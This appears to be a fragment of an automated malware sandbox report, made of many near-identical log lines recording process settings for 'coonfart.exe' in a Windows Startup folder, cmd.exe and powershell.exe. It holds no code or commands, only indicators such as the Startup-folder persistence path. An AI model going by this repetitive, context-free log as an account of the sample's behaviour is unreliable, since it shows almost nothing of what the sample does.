                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
